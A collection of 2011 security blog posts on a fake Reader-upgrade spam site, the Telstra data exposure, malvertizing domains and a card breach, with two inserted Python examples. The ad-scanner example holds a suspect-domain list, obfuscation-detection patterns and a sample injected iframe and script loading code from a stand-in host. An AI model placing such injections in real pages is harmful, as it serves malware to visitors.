December 2011 - Posts

SPAM: “official-reader-upgrade.com”

It’s not legit, people:

image

Click on the link you end up here:

image

But click on “Download Now” and look where you end up…

image

And, of course, it’s not free…

image

Interestingly, the McAfee logo is not clickable

image

We get it–you won :-D

image

Posted by sandi with no comments

More on the Telstra stuff up…

Word is that email is flowing again, which is good… as for the rest of this sorry tale…

More information is flowing in about what was exposed:
http://www.watoday.com.au/it-pro/security-it/telstra-customer-database-exposed-20111209-1on60.html?comments=34#comments

“detailed information outlining the customer's account number, what broadband plan they're on, what other Telstra services they're signed up to and notes associated with the customers' accounts including in many cases their usernames and passwords”

“details about technician visits, SMS messages sent to private mobile numbers and credit check details”

“At about 4.45pm AEDST, about an hour after Telstra was notified of the breach by this website, customer details were still accessible. At about 5pm AEDST the site presented internet users with "Access Denied".”

The source article also reveals that Telstra are a customer of Pure Hacking, a company that claims it has “the expertise needed to keep the wrong people from getting to the sensitive places in your computing infrastructure” – seems to me they missed something pretty damned basic here (assuming that Telstra purchased a service that should have picked up such a glaring deficiency).  Who knows, maybe Pure Hacking were only undertaking penetration testing and intrusion detection and prevention, which could, I guess, miss a "served-on-a-platter-all-you-can-eat-no-hacking-needed” incident like the Telstra one.

image

 

Ty Miller has a blog on the purehacking.com website, which I shall be watching with interest:
http://www.purehacking.com/blogs/ty-miller

image

Photo source: Michael Lee/ZDNet Australia via http://www.zdnet.com.au/telstra-exposes-customer-information-339327696.htm – original url: http://cdn.cbsi.com.au/story_media/339327696/bundlefail_1.jpg

Scammer paradise….

Oh great…

image

 

Imagine this. Some scammer spots the above tweet and thinks, “cool, let’s do some cold calls”…

“Hi Mr Telstra customer, we’re calling from Telstra about our screwup last week .. you saw our tweet on our official Twitter account saying we’d call everybody? Cool…” … and so the scam conversation goes on…

Telstra – registered express post is the way to go with this one… oh, sorry, is that too expensive? Tough!

In short, how are your customers meant to know, when that phone rings, that the person calling them is really Telstra, and not some scammer taking advantage of the situation?

Telstra exposes customer user names and passwords to the world

Unbelievable, isn’t it:
http://www.theage.com.au/it-pro/it-news/telstra-probes-privacy-breach-amid-network-outage-20111210-1ooez.html

Email, online billing, BigPond self-care and “My Account” have been down since Friday evening, and Twitter has been in meltdown.  Note: it seems that only *incoming* email is affected now – reports indicate that outgoing email is working just fine at time of writing (2:54 EST)

A horrid situation, to be sure, but I do wonder at some of the complaints that I am seeing on Twitter about the action Telstra took.

 

image

image

Imagine if Telstra had held off so it could notify customers first – that would have given spammers/scammers/criminals more time to use stolen credentials.

 

image

Really? You really sure you want them to do that? You might be one of the people who had their email username and password exposed.

 

Anyway… what’s to be the next step?  Obviously everybody at potential risk is going to have to change their passwords, but how to tell them to do it? Turn email access back on and send them an email, hoping that they’ll read it and change their password real quick.  But how to protect users during the window between email service being reactivated and passwords being changed? At the very least the Bigpond email servers should reject any connections not coming from a computer with a Bigpond IP address – it’s not perfect, and it has its drawbacks (a customer checking mail from a mobile network or somebody else’s connection is locked out too, and an attacker who is also a Bigpond customer walks straight through), but it’s better than nothing.  I don’t envy Telstra the challenges that face them now.
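To make the stop-gap concrete, here is an added example (my own illustration, not Telstra’s or Bigpond’s code) of the interim gate described above: mail logins are only accepted from the ISP’s own address space, except that the restriction lifts for an account as soon as that account’s password has been changed after the breach, which closes the window the previous paragraph worries about. The network ranges, the takedown timestamp, the usernames, the password-change records and the log lines are all constructed for illustration (the ranges are RFC 5737 documentation prefixes, not Bigpond’s real ones).

```python
"""Interim access gate for a breached mailbox population.

Added example, not Telstra's or Bigpond's code.  Policy: an account whose
password was changed after the breach cutoff may log in from anywhere; an
account still on its possibly-exposed password may only log in from the
ISP's own networks.  All data below is constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Hypothetical ISP-owned ranges (RFC 5737 documentation prefixes, not real Bigpond space).
ISP_NETWORKS = [ip_network("203.0.113.0/24"), ip_network("198.51.100.0/24")]

# Constructed time at which the exposed page started returning "Access Denied".
BREACH_CUTOFF = datetime(2011, 12, 9, 17, 0, tzinfo=timezone.utc)

# Constructed per-account record of the last password change (None = never changed).
LAST_PASSWORD_CHANGE = {
    "alice": datetime(2011, 12, 10, 9, 30, tzinfo=timezone.utc),  # rotated after takedown
    "bob": datetime(2011, 6, 1, 8, 0, tzinfo=timezone.utc),       # still on exposed password
    "carol": None,
}


@dataclass
class Decision:
    user: str
    client_ip: str
    allow: bool
    reason: str


def is_isp_address(addr: str) -> bool:
    """True if the client address falls inside one of the ISP's own networks."""
    ip = ip_address(addr)
    return any(ip in net for net in ISP_NETWORKS)


def password_rotated(user: str) -> bool:
    """True only if the account's password was changed after the breach cutoff."""
    changed = LAST_PASSWORD_CHANGE.get(user)
    return changed is not None and changed > BREACH_CUTOFF


def gate_login(user: str, client_ip: str) -> Decision:
    """Apply the interim policy to one POP/IMAP authentication attempt."""
    if password_rotated(user):
        return Decision(user, client_ip, True, "password changed after breach")
    if is_isp_address(client_ip):
        return Decision(user, client_ip, True, "on-net client, exposed password still in use")
    return Decision(user, client_ip, False, "off-net client and password not yet changed")


# Constructed mail-server auth log lines: "<iso-time> <user> <client-ip> <auth-result>".
# 192.0.2.0/24 is another documentation prefix, standing in for "somewhere off-net".
SAMPLE_LOG = """\
2011-12-11T02:10:44Z alice 192.0.2.9 ok
2011-12-11T02:11:02Z bob 203.0.113.77 ok
2011-12-11T02:11:30Z bob 192.0.2.9 ok
2011-12-11T02:12:05Z carol 198.51.100.5 ok
2011-12-11T02:12:40Z carol 192.0.2.44 ok
"""


def gate_log(log_text: str) -> list[Decision]:
    """Re-evaluate every successful authentication in the log under the interim policy."""
    decisions = []
    for line in log_text.splitlines():
        _ts, user, client_ip, _result = line.split()
        decisions.append(gate_login(user, client_ip))
    return decisions


if __name__ == "__main__":
    for d in gate_log(SAMPLE_LOG):
        print(f"{d.user:6} {d.client_ip:15} {'ALLOW' if d.allow else 'DENY':5} {d.reason}")
```

Run against the constructed log, alice (password already rotated) is allowed from off-net, bob is allowed from the ISP’s range but refused from outside it, and carol, who has never changed her password, is treated the same way. The on-net exception is the weakness the paragraph already admits to: it narrows who can use a stolen password, it does not stop a fellow customer, so the per-account lift on password change is what actually ends the exposure.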

Telstra users actually choose their own password when setting up their accounts in the shop nowadays instead of being issued a password by Telstra – I’ve been there when a salesman asked a person to write down their choice of password onto a piece of paper so that he could enter it into the computer.  I didn’t like that protocol then and I don’t like it now – I shudder to think how many people use the same password on multiple accounts.

We have no way of knowing how long the data breach existed, or how many people viewed the now disabled web page.  I would strongly recommend that affected users change not only their Telstra password but also the password of any other sites that they have used the same password for, ESPECIALLY if they have used their Bigpond email address as their log in name.

In fact, that advice applies to EVERYBODY.  Be very careful about sharing passwords across multiple services, and NEVER use non-unique passwords on email, banking or financially sensitive sites.  Ask yourself, if a site is hacked or your info is negligently exposed (as happened with Telstra), and somebody got your info from that one site, what other sites could they get access to?  Could crooks use your username and password to get into one of your email accounts? Could they then send password reset requests for *other* sites to the email account that they have got into? Think big picture.

Malvertizing activity

There has been a lot going on in the malvertizing world lately, with a spike in the number of reports coming in about malvertizing incidents that trace back to the ad server in question running an old, exploitable version of OpenX – people, we need to be running version 2.8.8.

The bad guys have been able to insert malicious iframes alongside legitimate advertising, and sometimes obfuscated JavaScript that causes various requests to domain names within the *.dyndns.org namespace.

A couple of domains implicated in malvertizing incidents are reonmedia.com and malidie.com

reonmedia.com (registered 19 June 2011 – reonmedia.com cookie spotted in a conversation about an infected computer here)
IP address at time of writing 176.65.162.61 – Zexotek It-services, Gmbh
Registrar: DIRECTI
Registrant: LEGAZ Inc, Anthony White (anthonywhite@gmail.com)
Sharing IP with adtiara.net

adtiara.net (registered 15 July 2011)
Registrar: DIRECTI
Registrant hidden by privacyprotect.org

malidie.com (registered 21 July 2011)
IP address at time of writing 188.72.204.48 – Hessen, Frankfurt, Netdirect
Registrar: BIZCN.COM, INC
Registrant hidden behind privacy-protect.cn
Sharing IP with inviasat.ru and gennetron.com

gennetron.com (registered 21 July 2011)
Registrar: DIRECTI
Registrant hidden behind privacy-protect.cn

inviasat.ru (registered 1 June 2011)
Registrar: REGRU-REG-RIPN
Registrant: “Private Person”

 

Also mentioned in recent times – trekmedia.net – including here:
http://stopmalvertising.com/tag/trekmedia.net.html

trekmedia.net (registered 14 February 2011)
IP address at time of writing 173.236.89.200
Registrar: ENOM, INC
Registrant hidden behind WhoisGuard

Also adveritising.com (note the extra letter i)

adveritising.com (registered 17 July 2011)
IP address at time of writing 50.17.195.149
Registrar: DYNADOT, LLC
Registrant hidden behind Dynadot Privacy
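For anybody who runs an ad server and wants to check what it is actually serving, here is an added example (my own code, not from the original post, from OpenX, or from any of the sites named above) that scans ad creatives for the pattern described earlier: an iframe or script injected alongside the legitimate banner that points at one of the domains listed above or at any *.dyndns.org host, a near-invisible iframe, or a script wrapped in a common obfuscation idiom. The two creatives at the bottom are constructed for illustration; the hostnames `ads.reonmedia.com` and `xyz.dyndns.org` inside them are made up to exercise the checks, and the obfuscation patterns are heuristics, not a complete list.

```python
"""Scan served ad creatives for injected iframes, suspect hosts and obfuscated scripts.

Added example, not code from the original post or from OpenX.  It uses only
the standard library so it can be dropped next to an ad server's log of
rendered creatives.  Sample creatives below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains the post names as implicated in malvertizing incidents, plus the
# parent zone the injected requests were seen going to.  Subdomains match too.
SUSPECT_ZONES = {
    "reonmedia.com", "adtiara.net", "malidie.com", "gennetron.com",
    "inviasat.ru", "trekmedia.net", "adveritising.com",
    "dyndns.org",
}

# Obfuscation wrappers commonly used by injected ad scripts (heuristic, not exhaustive).
OBFUSCATION_PATTERNS = [
    re.compile(r"eval\s*\(\s*unescape\s*\("),
    re.compile(r"document\.write\s*\(\s*unescape\s*\("),
    re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}"),
]


def host_is_suspect(host: str) -> bool:
    """True if host equals, or sits beneath, one of the suspect zones."""
    host = host.lower().rstrip(".")
    return any(host == z or host.endswith("." + z) for z in SUSPECT_ZONES)


class CreativeScanner(HTMLParser):
    """Collects findings while walking one creative's markup."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        # Any element that loads a remote resource is checked against the zones.
        if tag in ("iframe", "script", "img") and a.get("src"):
            host = urlsplit(a["src"]).hostname or ""
            if host_is_suspect(host):
                self.findings.append(f"{tag} src points at suspect host {host}")
        # A 0x0 / 1x1 or hidden iframe has no business in a banner.
        if tag == "iframe":
            w, h = a.get("width", ""), a.get("height", "")
            style = (a.get("style") or "").replace(" ", "").lower()
            if w in ("0", "1") or h in ("0", "1") or "display:none" in style or "visibility:hidden" in style:
                self.findings.append("near-invisible iframe")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands us the raw body of <script> blocks here.
        if self._in_script:
            for pat in OBFUSCATION_PATTERNS:
                if pat.search(data):
                    self.findings.append(f"obfuscated script matches {pat.pattern}")
                    break


def scan_creative(markup: str) -> list[str]:
    """Return the list of findings for one creative; empty means nothing suspicious."""
    scanner = CreativeScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


# Constructed creatives: a clean banner and the same banner with an injection appended.
CLEAN_CREATIVE = (
    '<a href="https://example.com/offer">'
    '<img src="https://cdn.example.com/banner.gif" width="300" height="250"></a>'
)
INJECTED_CREATIVE = (
    CLEAN_CREATIVE
    + '<iframe src="http://ads.reonmedia.com/in.cgi?3" width="1" height="1" style="display:none"></iframe>'
    + '<script>document.write(unescape("%3Cscript src=%22http://xyz.dyndns.org/ld.php%22%3E%3C/script%3E"));</script>'
)

if __name__ == "__main__":
    for name, creative in (("clean", CLEAN_CREATIVE), ("injected", INJECTED_CREATIVE)):
        print(name, scan_creative(creative) or "no findings")
```

The zone list is only as good as the day it was written; treat the domains above as a starting point and add whatever your own server logs turn up. The more durable checks are the structural ones: a banner that suddenly carries a hidden iframe or a `document.write(unescape(...))` block has been tampered with regardless of which domain it calls out to.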

Posted by sandi with 1 comment(s)

International Checkout (URL: internationalcheckout.com) hacked

A friend received the email below the other day.  Note that not only do International Checkout advise that “an intruder accessed and potentially compromised [their] system”, but the intruder / intruders also “gained access to part of [their] system that contained credit card numbers of customers” AND were able to “access the encryption key [for the credit card information database] that was stored separately”.  Storing the key “separately” only helps if whoever reaches the ciphertext cannot also reach the key; by their own account the intruder got both, so the encryption bought the cardholders nothing.

My friend’s credit card was misused, with many overseas transactions being charged to her card.

If you go to the internationalcheckout.com web site, and look at the large list of partners currently using the service, you can get a sense of the scale of the potential problem.

If you have used any of the merchants listed on the internationalcheckout.com web site please keep a close eye on your cards.  If you know anybody that has used the sites, let them know about what has happened.

 

image